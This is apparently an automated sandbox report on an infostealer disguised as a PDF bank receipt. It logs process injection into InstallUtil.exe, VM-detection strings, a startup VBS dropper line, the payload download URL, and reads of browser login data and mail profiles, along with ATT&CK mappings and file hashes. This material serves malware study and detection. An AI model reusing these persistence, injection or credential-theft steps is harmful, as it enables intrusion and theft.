              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597813s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597688s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597563s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597438s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597328s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597219s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -597094s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596985s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596860s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596735s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596610s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596485s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596360s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596235s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -596110s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595985s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595860s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595735s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595610s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595485s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595360s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595235s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -595110s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594985s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594860s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594735s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594610s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594485s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594360s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594235s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 5016Thread sleep time: -594110s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exeThread delayed: delay time: 100000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 600000
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Thread delayed: delay time: 100000
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
              Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
              Source: TypeName.exe, 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
              Source: TypeName.exe, 00000004.00000002.2181644021.000000000309C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
              Source: e-dekont (72).pdf(#U007e56 KB).exe, 00000000.00000002.2041086362.00000000011F2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000002.00000002.4476851419.0000000000D09000.00000004.00000020.00020000.00000000.sdmp, TypeName.exe, 00000004.00000002.2180142534.0000000001310000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.4476075155.00000000016C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Process information queried: ProcessInformation
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Code function: 4_2_06DA387F rdtsc 4_2_06DA387F
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Process token adjusted: Debug
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: e-dekont (72).pdf(#U007e56 KB).exe, InvocationDescriptorRule.cs Reference to suspicious API methods: ((FrameworkElement)selection).FindResource((object)"TextBlockTemplate")
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, NativeMethods.cs Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
              Source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.6c90000.10.raw.unpack, ResourceReferenceValue.cs Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 8F2008
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 422000
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 424000
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11F8008
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\TypeName.exe "C:\Users\user\AppData\Roaming\TypeName.exe"
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Queries volume information: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe VolumeInformation
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Queries volume information: C:\Users\user\AppData\Roaming\TypeName.exe VolumeInformation
              Source: C:\Users\user\AppData\Roaming\TypeName.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              Source: Yara match File source: 4.2.TypeName.exe.411fdb0.3.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.unpack, type: UNPACKEDPE
              Source: Yara match File source: 4.2.TypeName.exe.411fdb0.3.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.41413d0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.400fdb0.6.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 0.2.e-dekont (72).pdf(#U007e56 KB).exe.3fc1590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara match File source: 00000004.00000002.2181644021.00000000034AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2041673043.000000000339C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2192753528.000000000411F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2049418847.00000000041C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.4475386970.0000000000419000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.4478272423.0000000002BA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.4477967897.00000000034DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000004.00000002.2192753528.00000000041A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000002.00000002.4478272423.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000002.2049418847.0000000003FC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000006.00000002.4477967897.0000000003321000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1436, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

              Remote Access Functionality

Source: Yara match, File source: Process Memory Space: e-dekont (72).pdf(#U007e56 KB).exe PID: 7088, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 1436, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: TypeName.exe PID: 6512, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: InstallUtil.exe PID: 1476, type: MEMORYSTR

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Native API; 2 Command and Scripting Interpreter; 1 Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 111 Scripting; 1 DLL Side-Loading; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 DLL Side-Loading; 211 Process Injection; 1 Scheduled Task/Job; 2 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Disable or Modify Tools; 2 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 31 Virtualization/Sandbox Evasion; 211 Process Injection
Credential Access: 1 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 2 File and Directory Discovery; 13 System Information Discovery; 111 Security Software Discovery; 1 Process Discovery; 31 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Data from Local System; 1 Email Collection; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

[Behavior graph: ID 1553407, Sample: e-dekont (72).pdf(#U007e56 ..., Startdate: 11/11/2024, Architecture: WINDOWS, Score: 100]

Source | Detection | Scanner | Label | Link
e-dekont (72).pdf(#U007e56 KB).exe | 11% | ReversingLabs | |
e-dekont (72).pdf(#U007e56 KB).exe | 11% | Virustotal | | Browse
e-dekont (72).pdf(#U007e56 KB).exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\TypeName.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\TypeName.exe | 11% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://www.oleonidas.gr/slim/Tvifaznhqk.mp4 | 0% | Avira URL Cloud | safe |
http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008 | 0% | Avira URL Cloud | safe |
https://www.oleonidas.gr | 0% | Avira URL Cloud | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
oleonidas.gr | 185.78.221.73 | true | false | | unknown
reallyfreegeoip.org | 188.114.96.3 | true | false | | high
checkip.dyndns.com | 132.226.247.73 | true | false | | high
www.oleonidas.gr | unknown | unknown | true | | unknown
checkip.dyndns.org | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://checkip.dyndns.org/ | false | | high
https://reallyfreegeoip.org/xml/66.23.206.109 | false | | high
https://www.oleonidas.gr/slim/Tvifaznhqk.mp4 | false | Avira URL Cloud: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://github.com/mgravell/protobuf-neti | e-dekont (72).pdf(#U007e56 KB).exe | false | | high
https://reallyfreegeoip.org/xml/66.23.206.109$ | InstallUtil.exe | false | | high
https://stackoverflow.com/q/14436606/23354 | e-dekont (72).pdf(#U007e56 KB).exe, TypeName.exe | false | | high
https://github.com/mgravell/protobuf-netJ | e-dekont (72).pdf(#U007e56 KB).exe | false | | high
http://icsharpcode.net/sharpdevelop/syntaxdefinition/2008 | TypeName.exe.0.dr | false | Avira URL Cloud: safe | unknown
https://stackoverflow.com/q/11564914/23354; | e-dekont (72).pdf(#U007e56 KB).exe | false | | high
https://stackoverflow.com/q/2152978/23354 | e-dekont (72).pdf(#U007e56 KB).exe | false | | high
http://checkip.dyndns.org/q | e-dekont (72).pdf(#U007e56 KB).exe, TypeName.exe, InstallUtil.exe | false | | high
http://reallyfreegeoip.org | InstallUtil.exe | false | | high
https://github.com/mgravell/protobuf-net | e-dekont (72).pdf(#U007e56 KB).exe | false | | high
https://reallyfreegeoip.org | InstallUtil.exe | false | | high
http://checkip.dyndns.org | InstallUtil.exe | false | | high
http://checkip.dyndns.com | InstallUtil.exe | false | | high
https://www.oleonidas.gr | e-dekont (72).pdf(#U007e56 KB).exe, TypeName.exe | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | e-dekont (72).pdf(#U007e56 KB).exe, InstallUtil.exe, TypeName.exe | false | | high
https://reallyfreegeoip.org/xml/ | e-dekont (72).pdf(#U007e56 KB).exe, InstallUtil.exe, TypeName.exe | false | | high

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
188.114.96.3 | reallyfreegeoip.org | European Union | | 13335 | CLOUDFLARENETUS | false
185.78.221.73 | oleonidas.gr | Greece | | 47521 | IPHOSTGRIpDomainGR | false
132.226.247.73 | checkip.dyndns.com | United States | | 16989 | UTMEMUS | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1553407
Start date and time: 2024-11-11 05:16:04 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 11s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: e-dekont (72).pdf(#U007e56 KB).exe
renamed because original name is a hash value
Original Sample Name: e-dekont (72).pdf(~56 KB).exe
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                                        EGA Information:
                                                        • Successful, ratio: 50%
                                                        HCA Information:
                                                        • Successful, ratio: 95%
                                                        • Number of executed functions: 585
                                                        • Number of non-executed functions: 34
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                        • Execution Graph export aborted for target InstallUtil.exe, PID 1436 because it is empty
                                                        • Execution Graph export aborted for target InstallUtil.exe, PID 1476 because it is empty
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
05:16:56 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TypeName.vbs
23:16:51 | API Interceptor | 20x Sleep call for process: e-dekont (72).pdf(#U007e56 KB).exe modified
23:16:57 | API Interceptor | 14707323x Sleep call for process: InstallUtil.exe modified
23:17:05 | API Interceptor | 17x Sleep call for process: TypeName.exe modified

                                                              Process:C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe
                                                              File Type:ASCII text, with no line terminators
                                                              Category:dropped
                                                              Size (bytes):84
                                                              Entropy (8bit):4.803946256081595
                                                              Encrypted:false
                                                              SSDEEP:3:FER/n0eFHHoUkh4EaKC5fQSiHHn:FER/lFHI9aZ5YSin
                                                              MD5:959996C96B95DE7CFA11C0AE1340F1C8
                                                              SHA1:9302F666D56BB7596AD4B8D8C5005740F85047D5
                                                              SHA-256:0CFC3704C29220B9EA0702EB4A144288F1B8115B9194285A7694D9FB1068293E
                                                              SHA-512:03B6ED6DAF1651987D022644BBA9903D60BAB077E0A597DD60AF851C2979D827B508EAA35AC3EA4A726FA1F7CC8C5FEB87776E5688145CC331A68E082660BFF9
                                                              Malicious:true
                                                              Reputation:low
                                                              Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\TypeName.exe"""
                                                              Process:C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe
                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):1250816
                                                              Entropy (8bit):5.614106741263722
                                                              Encrypted:false
                                                              SSDEEP:24576:KqH4yLXhLnk1EhgwluwEAMBVuZh9zwVb1:KqHn2wowEA049zwVb
                                                              MD5:D99D18DBD5825F0FDDEF9063B0AFDF9C
                                                              SHA1:844A9EA45EEC0DC6E5418735DAD17FA4C45F589D
                                                              SHA-256:73E2CBDBD6EBF0C6FA0A287B375B719B3F576287C7950458D6A75F4E293F7655
                                                              SHA-512:8C75C5C84EDC33DA74011B7BE370061B3B6E3ADD6DAEA4F935B9A1EB2336D638160847293B057F9EDEED98686E64B5212B851AFAB6D8D72D9C70166F93C1CCBE
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                              • Antivirus: ReversingLabs, Detection: 11%
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...!P1g............................n+... ...@....@.. ....................................`................................. +..K....@.......................`....................................................... ............... ..H............text...t.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................P+......H........5..TB..........Tw..............................................*...(....*..0.......... ........8........E........S...,.......8......(....}.... ........8......|....(....*...}.... ....~....{>...9....& ....8......|......(...+ ....~....{*...:v...& ....8k.....(....&*.0..S....... ........8........E........w.......................................8.....s....r...ps....(....o...... ....~....{....:....& ....8........E........8.....x...& ....~....{E...:....& ....8........E.....
                                                              Process:C:\Users\user\Desktop\e-dekont (72).pdf(#U007e56 KB).exe
                                                              File Type:ASCII text, with CRLF line terminators
                                                              Category:modified
                                                              Size (bytes):26
                                                              Entropy (8bit):3.95006375643621
                                                              Encrypted:false
                                                              SSDEEP:3:ggPYV:rPYV
                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                              Malicious:true
                                                              Reputation:high, very likely benign file
                                                              Preview:[ZoneTransfer]....ZoneId=0
                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                              Entropy (8bit):5.614106741263722
                                                              TrID:
                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                              • Win32 Executable (generic) a (10002005/4) 49.78%
                                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                              • DOS Executable Generic (2002/1) 0.01%
                                                              File name:e-dekont (72).pdf(#U007e56 KB).exe
                                                              File size:1'250'816 bytes
                                                              MD5:d99d18dbd5825f0fddef9063b0afdf9c
                                                              SHA1:844a9ea45eec0dc6e5418735dad17fa4c45f589d
                                                              SHA256:73e2cbdbd6ebf0c6fa0a287b375b719b3f576287c7950458d6a75f4e293f7655
                                                              SHA512:8c75c5c84edc33da74011b7be370061b3b6e3add6daea4f935b9a1eb2336d638160847293b057f9edeed98686e64b5212b851afab6d8d72d9c70166f93c1ccbe
                                                              SSDEEP:24576:KqH4yLXhLnk1EhgwluwEAMBVuZh9zwVb1:KqHn2wowEA049zwVb
                                                              TLSH:E8459417F94799A3C29D2737C6ABA80E13F5E9856327D70B798E237A18C37B74841603
